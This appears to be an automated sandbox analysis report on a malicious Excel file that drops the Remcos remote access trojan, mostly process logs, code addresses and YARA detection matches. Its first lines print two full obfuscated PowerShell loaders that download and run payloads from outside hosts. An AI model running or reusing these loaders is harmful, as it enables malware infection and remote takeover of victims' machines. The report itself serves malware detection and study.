                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess Stats: CPU usage > 49%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,21_2_0040DD85
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00401806 NtdllDefWindowProc_W,21_2_00401806
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_004018C0 NtdllDefWindowProc_W,21_2_004018C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_004016FD NtdllDefWindowProc_A,23_2_004016FD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_004017B7 NtdllDefWindowProc_A,23_2_004017B7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00402CAC NtdllDefWindowProc_A,24_2_00402CAC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00402D66 NtdllDefWindowProc_A,24_2_00402D66
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,30_2_004167EF
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE89A2352E7_2_000007FE89A2352E
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_000007FE899F0A0914_2_000007FE899F0A09
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_1001719417_2_10017194
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_1000B5C117_2_1000B5C1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0044B04021_2_0044B040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0043610D21_2_0043610D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0044731021_2_00447310
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0044A49021_2_0044A490
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0040755A21_2_0040755A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0043C56021_2_0043C560
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0044B61021_2_0044B610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0044D6C021_2_0044D6C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_004476F021_2_004476F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0044B87021_2_0044B870
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0044081D21_2_0044081D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0041495721_2_00414957
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_004079EE21_2_004079EE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00407AEB21_2_00407AEB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0044AA8021_2_0044AA80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00412AA921_2_00412AA9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00404B7421_2_00404B74
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00404B0321_2_00404B03
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0044BBD821_2_0044BBD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00404BE521_2_00404BE5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00404C7621_2_00404C76
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00415CFE21_2_00415CFE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00416D7221_2_00416D72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00446D3021_2_00446D30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00446D8B21_2_00446D8B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00406E8F21_2_00406E8F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_0040503823_2_00405038
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_0041208C23_2_0041208C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_004050A923_2_004050A9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_0040511A23_2_0040511A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_0043C13A23_2_0043C13A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_004051AB23_2_004051AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_0044930023_2_00449300
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_0040D32223_2_0040D322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_0044A4F023_2_0044A4F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_0043A5AB23_2_0043A5AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_0041363123_2_00413631
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_0044669023_2_00446690
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_0044A73023_2_0044A730
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_004398D823_2_004398D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_004498E023_2_004498E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_0044A88623_2_0044A886
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_0043DA0923_2_0043DA09
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_00438D5E23_2_00438D5E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_00449ED023_2_00449ED0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_0041FE8323_2_0041FE83
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_00430F5423_2_00430F54
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_004050C224_2_004050C2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_004014AB24_2_004014AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0040513324_2_00405133
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_004051A424_2_004051A4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0040124624_2_00401246
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0040CA4624_2_0040CA46
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0040523524_2_00405235
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_004032C824_2_004032C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0040168924_2_00401689
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00402F6024_2_00402F60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0043706A30_2_0043706A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0041400530_2_00414005
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0043E11C30_2_0043E11C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_004541D930_2_004541D9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_004381E830_2_004381E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0041F18B30_2_0041F18B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0044627030_2_00446270
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0043E34B30_2_0043E34B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_004533AB30_2_004533AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0042742E30_2_0042742E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0043756630_2_00437566
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0043E5A830_2_0043E5A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_004387F030_2_004387F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0043797E30_2_0043797E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_004339D730_2_004339D7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0044DA4930_2_0044DA49
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_00427AD730_2_00427AD7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0041DBF330_2_0041DBF3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_00427C4030_2_00427C40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_00437DB330_2_00437DB3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_00435EEB30_2_00435EEB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0043DEED30_2_0043DEED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_00426E9F30_2_00426E9F
                    Source: QPS-36477.xlsOLE indicator, VBA macros: true
                    Source: QPS-36477.xlsStream path 'MBD001CA3FD/\x1Ole' : https://wrath.me/EhYykL'<{a;nUFXUq0NpmLtK8 5l-7h>aToWG4qamxy8gRPBfbrRRmg8Yr7jleepB0nvDhwOFy3FzbdBoq9Nlv7Oqgd7p6KV5bICezqWzXW02tDtIfkayOfD3Zqh3kOxiv33bXWibUWX9s"e&]g7CcwN#T[?=
                    Source: 58430000.0.drStream path 'MBD001CA3FD/\x1Ole' : https://wrath.me/EhYykL'<{a;nUFXUq0NpmLtK8 5l-7h>aToWG4qamxy8gRPBfbrRRmg8Yr7jleepB0nvDhwOFy3FzbdBoq9Nlv7Oqgd7p6KV5bICezqWzXW02tDtIfkayOfD3Zqh3kOxiv33bXWibUWX9s"e&]g7CcwN#T[?=
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004169A7 appears 87 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004165FF appears 35 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434801 appears 41 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00422297 appears 42 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434E70 appears 54 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00402093 appears 50 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0044DB70 appears 41 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00401E65 appears 34 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00444B5A appears 37 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00413025 appears 79 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00416760 appears 69 times
                    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                    Source: 30.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 30.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 30.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 29.2.powershell.exe.12a41af0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 29.2.powershell.exe.12a41af0.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 29.2.powershell.exe.12a41af0.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 30.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 30.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 30.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 14.2.powershell.exe.12b940b0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 14.2.powershell.exe.12b940b0.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 14.2.powershell.exe.12b940b0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 29.2.powershell.exe.12a41af0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 29.2.powershell.exe.12a41af0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 14.2.powershell.exe.12b940b0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 14.2.powershell.exe.12b940b0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
